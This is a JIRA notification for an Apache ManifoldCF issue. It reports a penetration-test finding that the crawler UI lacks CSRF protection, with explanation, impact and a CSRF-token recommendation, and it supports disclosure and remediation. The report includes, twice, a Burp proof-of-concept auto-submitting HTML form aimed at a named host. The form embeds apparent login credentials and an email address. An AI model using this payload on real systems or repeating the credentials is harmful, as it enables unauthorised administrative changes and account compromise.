[
https://issues.apache.org/jira/browse/CONNECTORS-1595?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
]
roel goovaerts updated CONNECTORS-1595:
---------------------------------------
Description:
Below is the full analysis and description as a result from the penetration
test.
*Summary*
The application is vulnerable to Cross-Site Request Forgery (CSRF).
A cross-site request forgery attack uses the following scenario:
1. An attacker creates a web page that includes an image or a form pointing to
the attacked application.
The image source would actually be a URL with parameters pointing to the
application page that
performs some action. In case of a form, the form action would point to the
action page in the target
application, and the form is submitted automatically by JavaScript when the
page is viewed.
2. The attacker tricks the victim user to browse to this page. The attacker may
get the victim to click a
link, or embed the attacking HTML code into some page the victim views, for
example in a bulletin
board or chat.
3. When the victim views the attacker's page, his browser sends a request
prepared by the attacker to
the attacked application. If the victim is logged in to the target application,
his browser will possess
all necessary session tokens, so the request will appear as authorized to the
application and
succeed.
A cross-site request forgery attack uses the fact that the victim's browser
possesses the necessary
authentication tokens to perform some actions in the target application.
*Impact*
A remote, unauthenticated attacker that can trick an authenticated user into
clicking a link crafted by the
attacker or open a malicious web page, can force the victim to unknowingly
perform various actions within
the application.
Given that the whole application is not protected against CSRF, any action that
an administrator can take on
Apache Manifold could be unknowingly performed if they fall for a CSRF attack.
*Affected Systems*
* [https://els-manifold-uat.bc:8475/mcf-crawler-ui/]
*Description*
It appears that the application does not implement any CSRF protection.
Consider the following example. An
attacker tricks a logged in application user to visit a page containing the
following code:
{code:java}
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://els-manifold-uat.bc:8475/mcf-crawler-ui/execute.jsp";
method="POST" enctype="multipart/form-data">
<input type="hidden" name="op" value="Save" />
<input type="hidden" name="type" value="connection" />
<input type="hidden" name="tabname" value="Name" />
<input type="hidden" name="isnewconnection" value="false" />
<input type="hidden" name="connname" value="clix-fr" />
<input type="hidden" name="description" value="" />
<input type="hidden" name="classname"
value="org.apache.manifoldcf.crawler.connectors.webcrawler.Webcr
awlerConnector" />
<input type="hidden" name="authorityname" value="_none_" />
<input type="hidden" name="throttlecount" value="0" />
<input type="hidden" name="maxconnections" value="10" />
<input type="hidden" name="email" value="ferdi.klomp@craftworkz.nl"
/>
<input type="hidden" name="robotsusage" value="none" />
<input type="hidden" name="metarobotstagsusage" value="all" />
<input type="hidden" name="regexp_bandwidth_0" value="" />
<input type="hidden" name="insensitive_bandwidth_0" value="false" />
<input type="hidden" name="connections_bandwidth_0" value="2" />
<input type="hidden" name="rate_bandwidth_0" value="64" />
<input type="hidden" name="fetches_bandwidth_0" value="12" />
<input type="hidden" name="bandwidth_count" value="1" />
<input type="hidden" name="acredential_count" value="0" />
<input type="hidden" name="scredential_0_regexp"
value="https://intrauat.web.bc/" />
<input type="hidden" name="scredential_0_0_regexp" value="login" />
<input type="hidden" name="scredential_0_0_type" value="form" />
<input type="hidden" name="scredential_0_0_matchregexp"
value="validation" />
<input type="hidden" name="scredential_0_0_overridetargeturl"
value=""
/>
<input type="hidden" name="scredential_0_0_0_op"
value="Continue" />
<input type="hidden" name="scredential_0_0_0_param"
value="username" />
<input type="hidden" name="scredential_0_0_0_value"
value="id996812" />
<input type="hidden" name="scredential_0_0_0_password" value=""
/>
<input type="hidden" name="scredential_0_0_1_op"
value="Continue" />
<input type="hidden" name="scredential_0_0_1_param"
value="password" />
<input type="hidden" name="scredential_0_0_1_value"
value="Th1sIs4cl1X" />
<input type="hidden" name="scredential_0_0_1_password" value=""
/>
<input type="hidden" name="scredential_0_0_2_op"
value="Continue" />
<input type="hidden" name="scredential_0_0_2_param"
value="login-form-type" />
<input type="hidden" name="scredential_0_0_2_value" value="pwd"
/>
<input type="hidden" name="scredential_0_0_2_password" value=""
/>
<input type="hidden" name="scredential_0_0_loginparamcount"
value="3" />
<input type="hidden" name="scredential_0_loginpagecount" value="1" />
<input type="hidden" name="scredential_count" value="1" />
<input type="hidden" name="regexp_trust_0"
value="https://intrauat.web.bc" />
<input type="hidden" name="trustall_trust_0" value="false" />
<input type="hidden" name="trust_count" value="1" />
<input type="hidden" name="proxyhost" value="" />
<input type="hidden" name="proxyport" value="" />
<input type="hidden" name="proxyauthusername" value="" />
<input type="hidden" name="proxyauthdomain" value="" />
<input type="hidden" name="proxyauthpassword" value="" />
<input type="hidden" name="client_timezone_offset" value="-60" />
<input type="hidden" name="client_timezone" value="Europe/Zurich" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
{code}
When the victim's browser parses the page and tries to load images, it will
cause them to execute any action
of the attacker's choosing on Manifold.
*Recommendations*
The usual approach to preventing CSRF attacks is to add a new parameter with an
unpredictable value to
each form or link that performs some action in the application, commonly
referred to as a CSRF-Token. The
parameter value should have enough entropy so that it cannot be predicted by an
attacker and should be
unique to the current user session. When the user submits the form or clicks
the link, the server side code
checks the parameter value. If it is valid, the request is accepted, otherwise
it is denied. The attacker has no
way of knowing the value of the unpredictable parameter, so he cannot construct
a form or link that will
submit a valid request.
*References*
* OWASP - Cross-Site Request Forgery - [https://www.owasp.org/index.php/Cross-]
Site_Request_Forgery
was:It appears that manifoldcf does not implement any CSRF protection.
> cross-site request forgery vulnerability
> ----------------------------------------
>
> Key: CONNECTORS-1595
> URL: https://issues.apache.org/jira/browse/CONNECTORS-1595
> Project: ManifoldCF
> Issue Type: Improvement
> Components: API
> Affects Versions: ManifoldCF 2.12
> Reporter: roel goovaerts
> Priority: Minor
>
> Below is the full analysis and description as a result from the penetration
> test.
> *Summary*
> The application is vulnerable to Cross-Site Request Forgery (CSRF).
> A cross-site request forgery attack uses the following scenario:
> 1. An attacker creates a web page that includes an image or a form pointing
> to the attacked application.
> The image source would actually be a URL with parameters pointing to the
> application page that
> performs some action. In case of a form, the form action would point to the
> action page in the target
> application, and the form is submitted automatically by JavaScript when the
> page is viewed.
> 2. The attacker tricks the victim user to browse to this page. The attacker
> may get the victim to click a
> link, or embed the attacking HTML code into some page the victim views, for
> example in a bulletin
> board or chat.
> 3. When the victim views the attacker's page, his browser sends a request
> prepared by the attacker to
> the attacked application. If the victim is logged in to the target
> application, his browser will possess
> all necessary session tokens, so the request will appear as authorized to the
> application and
> succeed.
> A cross-site request forgery attack uses the fact that the victim's browser
> possesses the necessary
> authentication tokens to perform some actions in the target application.
> *Impact*
> A remote, unauthenticated attacker that can trick an authenticated user into
> clicking a link crafted by the
> attacker or open a malicious web page, can force the victim to unknowingly
> perform various actions within
> the application.
> Given that the whole application is not protected against CSRF, any action
> that an administrator can take on
> Apache Manifold could be unknowingly performed if they fall for a CSRF attack.
> *Affected Systems*
> * [https://els-manifold-uat.bc:8475/mcf-crawler-ui/]
> *Description*
> It appears that the application does not implement any CSRF protection.
> Consider the following example. An
> attacker tricks a logged in application user to visit a page containing the
> following code:
> {code:java}
> <html>
> <!-- CSRF PoC - generated by Burp Suite Professional -->
> <body>
> <script>history.pushState('', '', '/')</script>
> <form action="https://els-manifold-uat.bc:8475/mcf-crawler-ui/execute.jsp";
> method="POST" enctype="multipart/form-data">
> <input type="hidden" name="op" value="Save" />
> <input type="hidden" name="type" value="connection" />
> <input type="hidden" name="tabname" value="Name" />
> <input type="hidden" name="isnewconnection" value="false" />
> <input type="hidden" name="connname" value="clix-fr" />
> <input type="hidden" name="description" value="" />
> <input type="hidden" name="classname"
> value="org.apache.manifoldcf.crawler.connectors.webcrawler.Webcr
> awlerConnector" />
> <input type="hidden" name="authorityname" value="_none_" />
> <input type="hidden" name="throttlecount" value="0" />
> <input type="hidden" name="maxconnections" value="10" />
> <input type="hidden" name="email"
> value="ferdi.klomp@craftworkz.nl" />
> <input type="hidden" name="robotsusage" value="none" />
> <input type="hidden" name="metarobotstagsusage" value="all" />
> <input type="hidden" name="regexp_bandwidth_0" value="" />
> <input type="hidden" name="insensitive_bandwidth_0" value="false" />
> <input type="hidden" name="connections_bandwidth_0" value="2" />
> <input type="hidden" name="rate_bandwidth_0" value="64" />
> <input type="hidden" name="fetches_bandwidth_0" value="12" />
> <input type="hidden" name="bandwidth_count" value="1" />
> <input type="hidden" name="acredential_count" value="0" />
> <input type="hidden" name="scredential_0_regexp"
> value="https://intrauat.web.bc/" />
> <input type="hidden" name="scredential_0_0_regexp" value="login"
> />
> <input type="hidden" name="scredential_0_0_type" value="form" />
> <input type="hidden" name="scredential_0_0_matchregexp"
> value="validation" />
> <input type="hidden" name="scredential_0_0_overridetargeturl"
> value=""
> />
> <input type="hidden" name="scredential_0_0_0_op"
> value="Continue" />
> <input type="hidden" name="scredential_0_0_0_param"
> value="username" />
> <input type="hidden" name="scredential_0_0_0_value"
> value="id996812" />
> <input type="hidden" name="scredential_0_0_0_password"
> value="" />
> <input type="hidden" name="scredential_0_0_1_op"
> value="Continue" />
> <input type="hidden" name="scredential_0_0_1_param"
> value="password" />
> <input type="hidden" name="scredential_0_0_1_value"
> value="Th1sIs4cl1X" />
> <input type="hidden" name="scredential_0_0_1_password"
> value="" />
> <input type="hidden" name="scredential_0_0_2_op"
> value="Continue" />
> <input type="hidden" name="scredential_0_0_2_param"
> value="login-form-type" />
> <input type="hidden" name="scredential_0_0_2_value"
> value="pwd" />
> <input type="hidden" name="scredential_0_0_2_password"
> value="" />
> <input type="hidden" name="scredential_0_0_loginparamcount"
> value="3" />
> <input type="hidden" name="scredential_0_loginpagecount" value="1" />
> <input type="hidden" name="scredential_count" value="1" />
> <input type="hidden" name="regexp_trust_0"
> value="https://intrauat.web.bc" />
> <input type="hidden" name="trustall_trust_0" value="false" />
> <input type="hidden" name="trust_count" value="1" />
> <input type="hidden" name="proxyhost" value="" />
> <input type="hidden" name="proxyport" value="" />
> <input type="hidden" name="proxyauthusername" value="" />
> <input type="hidden" name="proxyauthdomain" value="" />
> <input type="hidden" name="proxyauthpassword" value="" />
> <input type="hidden" name="client_timezone_offset" value="-60" />
> <input type="hidden" name="client_timezone" value="Europe/Zurich" />
> <input type="submit" value="Submit request" />
> </form>
> </body>
> </html>
> {code}
> When the victim's browser parses the page and tries to load images, it will
> cause them to execute any action
> of the attacker's choosing on Manifold.
> *Recommendations*
> The usual approach to preventing CSRF attacks is to add a new parameter with
> an unpredictable value to
> each form or link that performs some action in the application, commonly
> referred to as a CSRF-Token. The
> parameter value should have enough entropy so that it cannot be predicted by
> an attacker and should be
> unique to the current user session. When the user submits the form or clicks
> the link, the server side code
> checks the parameter value. If it is valid, the request is accepted,
> otherwise it is denied. The attacker has no
> way of knowing the value of the unpredictable parameter, so he cannot
> construct a form or link that will
> submit a valid request.
> *References*
> * OWASP - Cross-Site Request Forgery -
> [https://www.owasp.org/index.php/Cross-]
> Site_Request_Forgery
--
This message was sent by Atlassian JIRA
(v7.6.3#76005)
